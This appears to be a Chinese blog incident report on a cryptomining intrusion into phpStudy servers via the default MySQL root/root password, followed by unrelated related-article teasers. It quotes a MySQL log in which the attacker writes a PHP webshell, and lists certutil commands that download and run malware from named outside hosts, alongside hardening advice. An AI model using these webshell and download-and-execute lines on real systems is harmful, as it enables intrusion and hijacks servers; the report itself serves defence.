今天客户服务器上出现报警,查找了下原因,发现根目录下有wk.php

E:\phpStudy\MySQL\bin\mysqld.exe, Version: 5.5. (MySQL Community Server (GPL)). started with:

TCP Port: , Named Pipe: MySQL

Time                 Id Command    Argument

          Quit

 ::      Connect    root@localhost on

          Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'

          Init DB    mysql

          Init DB    mysql

          Query    SELECT '<?php @system("certutil.exe -urlcache -split -f http://m4.rui2.net/upload/12/2016/10/wk.exe");@phpinfo();@system("certutil.exe -urlcache -split -f http://14.29.194.121:22/server_sql.php");@sleep(2);@system('wk.exe');?>'

          Query    SHOW VARIABLES LIKE 'language'

          Quit

 ::      Connect    root@localhost on

          Query    SET NAMES 'utf8' COLLATE 'utf8_general_ci'

          Init DB    mysql

          Init DB    mysql

          Query    set global general_log='off'

查了下原因,是针对phpStudy网站服务器进行批量入侵的挖矿木马

攻击者对互联网上的服务器进行批量扫描,发现易受攻击的phpStudy系统后,利用用户在安装时未进行修改的MySQL弱密码进行登录,并进一步植入WebShell,然后通过shell下载挖矿木马挖门罗币。

中招主机通过phpStudy一键部署PHP环境,默认情况下包含phpinfo及phpMyAdmin并且任何人都可以访问,同时安装的MySQL默认口令为弱口令密码root/root,且开启在外网3306端口,在未设置安全组或者安全组为放通全端口的情况下,受到攻击者对于phpStudy的针对性探测,并且暴露了其MySQL弱口令。

特点:

  (1)都是通过探测phpStudy搭建的php环境进行攻击

  (2)通过webshell植入挖矿木马时,白利用certutil.exe

命令1

certutil.exe -urlcache -split -f http://down.ctosus.ru/wkinstall.exe &wkinstall.exe &del wkinstall.exe

命令2

certutil.exe  -urlcache  -split  -f  http://m4.rui2.net/upload/12/2016/10/wk.exe  &wk.exe

  (3)挖矿木马通过bat脚本启动,且矿机采用xmr-stak挖矿工具

  (4)在挖矿的同时植入大灰狼远控木马

安全建议:

  (1)修复系统漏洞

  (2)集成环境,在安装结束后应及时修改MySQL密码为强密码,最低密码长度不要低于11位,组合最好是字母数字和符号;删除l.php(探针文件),避免被黑客探测入侵

  (3)增加安全策略

参考:https://s.tencent.com/research/report/642.html

针对phpStudy网站服务器的入侵的更多相关文章

  1. 利用phpStudy 探针 提权网站服务器

    声明: 本教程仅仅是演示管理员安全意识不强,存在弱口令情况.网站被非法入侵的演示,请勿用于恶意用途! 今天看到论坛有人发布了一个通过这phpStudy 探针 关键字搜索检索提权网址服务器,这个挺简单的 ...

  2. [转帖]御界预警:3700余台SQL服务器被入侵挖矿 或导致严重信息泄露事件

    御界预警:3700余台SQL服务器被入侵挖矿 或导致严重信息泄露事件 https://zhuanlan.kanxue.com/article-8292.htm sqlserver的弱密码破解和提权攻击 ...

  3. Linux服务器被入侵后的处理过程(转发阿良)

    Linux服务器被入侵后的处理过程   突然,频繁收到一组服务器 ping 监控不可达邮件,赶紧登陆 zabbix 监控系统查看流量状况. 可见流量已经达到了 800M 左右,这肯定不正常了,马上尝试 ...

  4. phpMyAdmin:无法在发生错误时创建会话,请检查 PHP 或网站服务器日志,并正确配置 PHP 安装。

    一:错误提示 英文:Cannot start session without errors, please check errors given in your PHP and/or webserve ...

  5. IIS网站服务器性能优化指南(转载)

    原文网址:http://www.phontol.com/20090507_419416_1.html       Windows Server自带的互联网信息服务器(Internet Informat ...

  6. 发布方配ASP.NET网站服务器

    方配ASP.NET网站服务器是一款简单,轻量,灵活的ASP.NET网站服务器,使用它可以无需安装复杂的IIS,直接就可以运行ASP.NET网站,使用非常简单,把exe文件拷贝到ASP.NET的网站目录 ...

  7. Nginx+Lua+Redis整合实现高性能API接口 - 网站服务器 - LinuxTone | 运维专家网论坛 - 最棒的Linux运维与开源架构技术交流社区! - Powered by Discuz!

    Nginx+Lua+Redis整合实现高性能API接口 - 网站服务器 - LinuxTone | 运维专家网论坛 - 最棒的Linux运维与开源架构技术交流社区! - Powered by Disc ...

  8. 网站服务器、VPS和虚拟主机的联系与区别

     网站服务器是指在互联网数据中心中存放网站的服务器.主要用于网站的互联网中的发布.应用,是网络应用的基础硬件设施.简单的说服务器就是一台电脑,只是这台电脑因为要24 小时高速运行,所以配置要比一般的家 ...

  9. struts2之高危远程代码执行漏洞,可造成服务器被入侵,下载最新版本进行修复

          Struts2 被发现存在新的高危远程代码执行漏洞,可造成服务器被入侵,只要是Struts2版本 低于 2.3.14.3 全部存在此漏洞.目前官方已经发布了最新的版本进行修复.请将stru ...

随机推荐

  1. php 去重

    对于二维数组咱们分两种情况讨论,一种是因为某一键名的值不能重复,删除重复项:另一种因为内部的一维数组不能完全相同,而删除重复项,下面举例说明:  ㈠因为某一键名的值不能重复,删除重复项 <?ph ...

  2. Oozie分布式工作流——流控制

    最近又开始捅咕上oozie了,所以回头还是翻译一下oozie的文档.文档里面最重要就属这一章了--工作流定义. 一提到工作流,首先想到的应该是工作流都支持哪些工作依赖关系,比如串式的执行,或者一对多, ...

  3. Chrome RenderText分析(1)

      先从一些基础的类开始 1.Range // A Range contains two integer values that represent a numeric range, like the ...

  4. keybd_event 被 SendInput 替代

    keybd_event   函数功能:该函数合成一次击键事件.系统可使用这种合成的击键事件来产生WM_KEYUP或WM_KEYDOWN消息,键盘驱动程序的中断处理程序调用keybd_event函数.在 ...

  5. DockOne技术分享(二十):Docker三剑客之Swarm介绍

    [编者的话]Swarm项目是Docker公司发布三剑客中的一员,用来提供容器集群服务,目的是更好的帮助用户管理多个Docker Engine,方便用户使用,像使用Docker Engine一样使用容器 ...

  6. grid - 网格项目跨行或跨列

    默认情况下网格项目跨度只有一个列和行,但可以跨越多个行和列. 1.可以通过设置grid-column-end和grid-column-start距离多个网络线号实现多个列跨越. <view cl ...

  7. C#串口SerialPort常用属性方法

    SerialPort(): //属性 .BaudRate;获取或设置波特率 .BytesToRead;得到 接收到数据的字节数 .BytesToWrites;得到送往串口的字节数 .DataBits; ...

  8. WEB前端工程师的职业发展路线图、怎样做WEB前端职业规划

    20151028整理 —————————— 知乎-Web前端的路该怎么走?(2015年发表) 在规模越大的团队,工作划分得越细腻,专注的点就越深,但同时就可能会被限制在某个狭窄点上,成为某个角落的技术 ...

  9. 【C#】详解C#事件

    目录结构: contents structure [+] 事件基本介绍 定义事件类型 定义事件成员 定义引发事件的方法 以线程安全的方式引发事件 登记事件关注 揭秘事件 显式实现事件 为什么需要显式实 ...

  10. Swift 与 C 语言混合编程

    前言 作为一种可与 Objective-C 相互调用的语言,Swift 也具有一些与 C 语言的类型和特性,如果你的代码有需要,Swift 也提供了和常见的 C 代码结构混合编程的编程方式. 1.基本 ...